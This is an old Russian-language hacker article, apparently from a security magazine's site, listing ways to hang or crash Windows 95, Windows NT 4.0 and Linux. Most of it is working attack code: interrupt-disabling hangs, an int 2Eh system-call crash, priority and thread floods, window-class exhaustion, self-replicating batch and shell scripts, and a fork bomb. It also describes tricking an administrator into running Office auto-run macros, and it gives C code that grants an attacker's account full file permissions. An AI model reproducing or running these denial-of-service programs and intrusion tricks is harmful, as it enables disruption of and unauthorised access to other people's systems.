БPЕДИСЛОВИЕ

Здесь я постарался собрать
совершенно никому не нужные факты о WINDOWS 95, WINDOWS NT,UNIX. Хотя кто знает ? Может она на что и сгодится.
Под NT тут понимается NT 4.0, под Unix — Linux Red Hat. Я буду благодарен всем, кто поможет дополнить/исправить/уточнить эту статью.
Если Вы возмущены тематикой или последствиями вызванными этой
статьей то cp thisfile /dev/nul или del thisfile.

Дырки WINDOWS 95

Этой операционке мы уделим мало внимания, так как она является
одной большой дырой, и любой, кто не ленив, может с ней делать
все что он хочет 😉

Весим (CLI в DosBox)

Идея проста до безобразия … Дело в том, что VMM не виртуализирует IF в
VDM. Тогда становится очевидно, что запретив прерывания и перейдя в бесконечный
цикл мы блокируем планировщик. Результат — система висит. 

code SEGMENT byte public ‘CODE’
ASSUME cs:code, ds:code
ORG 100h

start: cli
jmp $-2

code ENDS
END start

Весим (бесконечный цикл в Win16
app)

#include <windows.h>

int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR szLine,int Cmd)
{
while(TRUE);
}

Не даем загрузиться системе
(system.ini)

Создайте файл system.ini >= 64kb. Тогда система при загрузке
повиснет/перезагрузится. Причина в том, что так как обычно
system.ini много меньше 64Kb, то кодировщик Microsoft просто-напросто
решил считывать из этого файла 0FFFFh байт в сегмент размером 6720h
байт. Результат можете понаблюдать сами 🙂

Дырки WINDOWS NT

Аварийный останов (NtSetInformationFile)

Вот консольная Win32 программа которая приводит
к печальным последствиям …

#include <windows.h>

main()
{
LONG *Fool=new LONG[10];
_asm mov eax, 0a0h
_asm mov edx, [Fool]
_asm int 2Eh
}

Вообще программа выглядит странно, но то, что она делает почти совпадает
с недокументированной функцией NtSetInformationFile из ntdll.dll 

NtSetInformationFile
77f67f60 mov eax, 000000A0h
77f67f65 lea edx, dword ptr [esp+04]
77f67f69 int 2Eh

Отличие в том, что я в качестве параметра передаю указатель на мусор.

Весим (SetPriorityClass)

У предыдущей программы есть большой недостаток — она
машинно-ориентированная. Однако довольно легко завесить NT
используя только  Win32 API.

#include <windows.h>

main()
{
SetPriorityClass(REALTIME_PRIORITY_CLASS);
while(TRUE);
}

Тут правда есть некоторые тонкости. Во-первых эта программа не
возымеет должного действия на многопроцессорную машину. Во-вторых программа
должна быть запущена пользователем с правом Increase Scheduling
Priority. 

Весим (SetPriorityClass +)

Предыдущую программу легко переписать с использованием лишь
приоритета HIGH, на который никаких прав не нужно. Дело в том,
что планировщик OS ничего не знает о процессах, он распределяет
время между потоками. По этой причине если у одной программы потоков
будет на порядок больше чем у другой, то все процессы, кроме нашего,
фактически не получат время. Вот реализация этой идеи:

DWORD ThreadProc(LPDWORD)
{
while(TRUE);
return 0;
}

int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR szLine,int Cmd)
{
DWORD dwResult;
SetPriorityClass(GetCurrentProcess(),HIGH_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_HIGHEST);
while(TRUE)
{
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ThreadProc,NULL,0,&dwResult);
}
return 0;
}

Весим (hangup.bat)

Другая идея состоит в том, чтобы создать очень много VDM
которые будут активно что-то делать. Естественно, что это
довольно быстро забьет всю память, и порядком загрузит процессор.

start hangup.bat
start hangup.bat

Аварийный останов (SetWindowPos)

Забавно, но кажется, что страсть разработчиков к оптимизации
не имеет пределов … Вот к чему это привело в случае с
NT. Такая вот Win32 прога приводит к аварийному останову системы.

#include <windows.h>

int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmd)
{
HWND hWnd=CreateWindow("EDIT","NONE",WS_VISIBLE,0,0,100,100,0,0,hInst,0);
SetWindowPos(hWnd,(HWND)0xFFFF,0,0,0,0,3);
}

Атака, к сожалению, не является идеальной по нескольким причинам.
Во первых она являет собой лишь использование ошибки кодировщика,
что говорит о том, что уже в следующих версиях она будет скорее
всего устранена. Во вторых, насколько мне
известно, этот трюк срабатывает лишь в версии x86. 

«АтОмная» атака

В порыве энтузиазма разработчики NT на удивление хорошо ее защитили,
не считая конечно досадных мелочей … Действительно программа
может открыть столько окон, сколько ей заблагорассудится — sucs 😉
Если еще учесть, что количество атомов в системе конечно, то все это
начинает становится забавным. Вот Win32 программа которая делает…

#include <windows.h>
#include <stdio.h>

int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPerv,LPSTR lpszCmd,int Cmd)
{
int i,j;
char szFool[0x40];
WNDCLASS wc;

for(i=0;;i++)
{
srand(i);
for(j=0;j < 0x20;j++) szFool[j]=(rand() >> 7) & 0xFF;
szFool[0x20]=0;
wc.style = NULL;
wc.lpfnWndProc = DefWindowProc;
wc.cbClsExtra = 0;
wc.cbWndExtra = 0;
wc.hInstance = hInst;
wc.hIcon = NULL;
wc.hCursor = NULL;
wc.hbrBackground = NULL;
wc.lpszMenuName = NULL;
wc.lpszClassName = szFool;
RegisterClass(&wc);
}
}

Которая что-то делает 😉 Идея атаки в том, что если мы откроим max количество
классов окон, то больше никто в системе не сможет открыть
окно, так как для этого придется создать еще один класс окна.
К примеру, если до атаки не был запущен Task Manager, то
после атаки мы не сможем прибить атакующий процесс потому,
что для этого Task Manager должен будет для себя открыть окно,
что разумеется он сделать не может. 

Методы проникновения в систему

Давайте немного поразмышляем о том, что собственно нам нужно …
Очевидно цели могут быть две:
a. получить доступ к секретной информации
b. получить права admin’a.

В конкретной ситуации желательно адекватно подходить к этому вопросу.
Самое первое, что приходит в голову — заставить admin’a запустить
нашу программу. Так как WinWord,Excel,Access уже стали неким атрибутом
соврeмeнного офиса, то было бы непростительно с нашей стороны
не воспользоваться этим фактом. Дело в том, что документы/таблицы
как правило не вызывают никаких подозрений, хотя по
сути несут в себе большую угрозу …

Проникновение посредством
Access/WinWord/Excel

MS Access автоматически исполняет макрос AutoExec. Из которого
мы можем запустить нашу программу, или же (используя возможность вызывать из Access Basic API функции)
состряпать все дельце вообще не используя внешних программ.
Тоже самое относится и к Word/Excel. С Word правда есть небольшая сложность … Word 7.0, по умолчанию,
при обнаружении макроса «на автозапуск» спрашивает вашего разрешения. 

Получение прав на директорию

Какую же программу мы хотим запустить?
Ниже приведен пример который дает пользователю/группе lpszAccount полный доступ к
диску/директории/файлу szFileName. Ее можно перевести
на Access/Word Basic и использовать в своих целях 😉 или же откомпилить и подсунуть admin’у каким-либо другим образом.

//
// Copyright (C) 1996 by Sergey Zabaryansky
//

#include <windows.h>
#include <stdio.h>
#include <conio.h>

TCHAR *szFileName=»e:\\sites.txt»;

void main()
{
DWORD dwResult;
PACL pACLNew,pACL;
PSID pSID;
DWORD cbSID = 1024;
LPSTR lpszAccount = «UserA»;
DWORD cchDomainName = 128;
TCHAR szDomain[128];
void *pACE;
PSECURITY_DESCRIPTOR pSD,sd;
PSID_NAME_USE psnuType;

pSD = (PSECURITY_DESCRIPTOR)new BYTE[4096];
pACLNew = (PACL)new BYTE[4096];
pSID = (PSID)new BYTE[cbSID];
psnuType = (PSID_NAME_USE)new BYTE[1024];

InitializeSecurityDescriptor(pSD,SECURITY_DESCRIPTOR_REVISION);
InitializeAcl(pACLNew,4096,ACL_REVISION2);
LookupAccountName(NULL,lpszAccount,pSID,&cbSID,szDomain,&cchDomainName,psnuTyp
e);

// concat the previous access
sd=(SECURITY_DESCRIPTOR *)new BYTE[0x400];
GetFileSecurity(szFileName,DACL_SECURITY_INFORMATION,sd,0x400,&dwResult);
GetSecurityDescriptorDacl(sd,(int *)&dwResult,&pACL,(int *)&dwResult);
for(int i=0;i < pACL->AceCount;i++)
{
GetAce(pACL,i,&pACE);
AddAce(pACLNew,ACL_REVISION,MAXDWORD,pACE,((PACE_HEADER)pACE)->AceSize);
}
// add new ACE
AddAccessAllowedAce(pACLNew,ACL_REVISION2,0xFFFFFFFF,pSID);

SetSecurityDescriptorDacl(pSD,TRUE,pACLNew,FALSE);
SetFileSecurity(szFileName,DACL_SECURITY_INFORMATION,pSD);

delete pSID;
delete pSD;
delete pACLNew;
delete psnuType;
}

Дырки в UNIX

Сat атака

Такой вот, командный файл hangunix
запущенный в фоне весит Unix.

cat hangunix > x
cat x >> hangunix
./hangunix &
./hangunix &

fork() атака

#include <unistd.h>

main()
{
while(1) fork();
}

Эта программа порождает свои копии до тех пор, пока это возможно.
Она должна быть запущена в фоне. После этого вы не сможете
запустить ни одну программу, так как система не сможет
создать еще один процесс, кроме того OS начнет
жутко тормозить. 

Справедливости ради нужно отметить, что эти атаки не
возымеют действия если будет использована программа
ulimit. 

Вот такие дырки были обнаружены мной в эксплуатационно-исследовательском
процессе различных систем. Если у кого есть что добавить, то как говорится
вам и флаг в руки и паровоз навстречу :).

З.Ы. Если что-то не понятно в программах или оно вообще непонятны,
то не спеши заваливать мою мыльницу письмами с просьбами написать
что-то для чего-то, а сходи на барахолку и купи умную книжку,
глядишь что-то и понятно станет.

Оставить мнение

Check Also

Компания OnePlus подтвердила утечку данных банковских карт 40 000 пользователей

Неизвестные атакующие похитили информацию о банковских картах более чем 40 000 клиентов ин…